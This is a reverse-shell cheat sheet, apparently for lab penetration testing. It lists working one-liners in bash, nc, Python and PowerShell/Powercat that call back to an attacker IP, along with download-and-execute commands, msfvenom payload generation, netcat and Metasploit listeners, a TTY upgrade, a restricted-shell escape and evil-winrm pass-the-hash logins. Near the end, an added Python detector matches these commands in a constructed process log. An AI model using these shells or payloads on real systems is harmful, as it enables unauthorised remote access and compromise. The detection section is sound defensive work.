Reverse Shells

Below are reverse shells in different languages and with different tools, followed by matching listeners.


Upgrade Shell

Below is a step-by-step guide to upgrading a basic reverse shell into a fully interactive one.

  1. Spawn an interactive shell with Python

  2. Send shell into the background (CTRL-Z)

  3. Set the TTY.

The commands to run for each step are shown below.

1. Spawn an interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash");'

2. Send the shell to the background

CTRL-Z

3. Set the TTY

Run stty -a in your own terminal first to read its rows and cols values. The stty raw -echo; fg line is run locally, the last two lines are run inside the reverse shell once it is back in the foreground.

stty -a
stty raw -echo; fg
stty rows 66 cols 157
export TERM=xterm

After all the above steps we should have a more stable reverse shell with tab completion, job control and working Ctrl-C.


Break out of restricted environment

echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null

The one-liner above comes from GTFOBins; it only works if the at binary is present on the target.


Listeners

nc

rlwrap nc -lvnp 9001

msfconsole

msfconsole -q -r handler.res
# handler.res
use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/shell_reverse_tcp
set ExitOnSession false
exploit -j

The payload line must match the payload used to generate the shell (see the msfvenom section below); change it if a different payload is used.


Bash

bash -i >& /dev/tcp/10.10.14.161/9001 0>&1
curl http://10.10.14.161/shell.sh | bash
echo -n "bash  -i >& /dev/tcp/10.10.14.161/9001   0>&1" | base64 -w0
echo <b64string> | base64 -d | bash

shell.sh

#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.161/9001 0>&1"

nc

nc 10.10.14.161 9001 -c bash
nc 10.10.14.161 9001 -e bash
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc 10.10.14.161 9001 > /tmp/f

Evil-WinRM

evil-winrm -i 10.10.10.100 -u cub3 -p password
evil-winrm -i 10.10.10.100 -u cub3 -H hash

Certificate Authentication

openssl pkcs12 -in file.pfx -nocerts -nodes -out key.pem
openssl pkcs12 -in file.pfx -nokeys -out key.crt
evil-winrm -S -i 10.10.10.100 -c key.crt -k key.pem

PowerShell

echo "ping 10.10.14.161" | iconv -t utf-16le | base64 -w 0
powershell -ep bypass -enc <encodedCommand>

Powercat

IEX (New-Object System.Net.WebClient).DownloadString("http://10.10.14.161/powercat.ps1");powercat -c 10.10.14.161 -p 443 -e powershell

Python

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.161",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
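The Bash, nc and Python one-liners above, and the pty.spawn upgrade step, all leave recognisable traces in process command-line logging. The following detector is an added example from the defensive side, not part of the original cheat sheet; the regexes are derived from the commands on this page and the log records it scans are constructed (the "<pid> <user> <command line>" format and the pids are assumptions).

```python
import re

# Regexes derived from the one-liners listed on this page (constructed for this example);
# each is kept narrow so that ordinary admin commands do not trip it.
PATTERNS = {
    "bash_dev_tcp":    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "nc_exec":         re.compile(r"\bnc\b.*\s-[ce]\s+(?:/bin/)?(?:ba)?sh\b"),
    "mkfifo_nc":       re.compile(r"\bmkfifo\s+\S+.*\|\s*nc\b"),
    "python_dup2_pty": re.compile(r"dup2\(.*pty\.spawn\("),
    "pty_spawn":       re.compile(r"pty\.spawn\("),
    "pipe_to_shell":   re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
    "base64_to_shell": re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"),
    "ps_encoded":      re.compile(r"powershell.*\s-(?:enc|encodedcommand|e)\b", re.I),
}

def scan_cmdline(cmdline):
    """Return the names of all patterns that match a single command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmdline)]

def scan_log(lines):
    """Scan constructed '<pid> <user> <command line>' records; return (pid, user, hits) per match."""
    findings = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue  # malformed record, skip it
        pid, user, cmd = parts
        hits = scan_cmdline(cmd)
        if hits:
            findings.append((pid, user, hits))
    return findings

# Constructed sample records: the page's one-liners mixed with benign admin activity.
SAMPLE_LOG = [
    "4021 www-data bash -i >& /dev/tcp/10.10.14.161/9001 0>&1",
    "4022 www-data nc 10.10.14.161 9001 -e bash",
    "4023 root rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc 10.10.14.161 9001 > /tmp/f",
    "4024 www-data python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.161\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'",
    "4025 www-data python3 -c 'import pty;pty.spawn(\"/bin/bash\");'",
    "4026 www-data curl http://10.10.14.161/shell.sh | bash",
    "4027 alice python3 manage.py runserver 0.0.0.0:8000",
    "4028 root nc -zv db.internal 5432",
    "4029 alice bash -c 'ls -la /var/log'",
]

if __name__ == "__main__":
    for pid, user, hits in scan_log(SAMPLE_LOG):
        print(f"pid={pid} user={user} matched={','.join(hits)}")
```

The three benign records (4027 to 4029) produce no hits, while the pty.spawn upgrade command (4025) is flagged on its own, which is useful because it normally follows a successful callback within seconds.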

msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=9001 -f exe > sh.exe
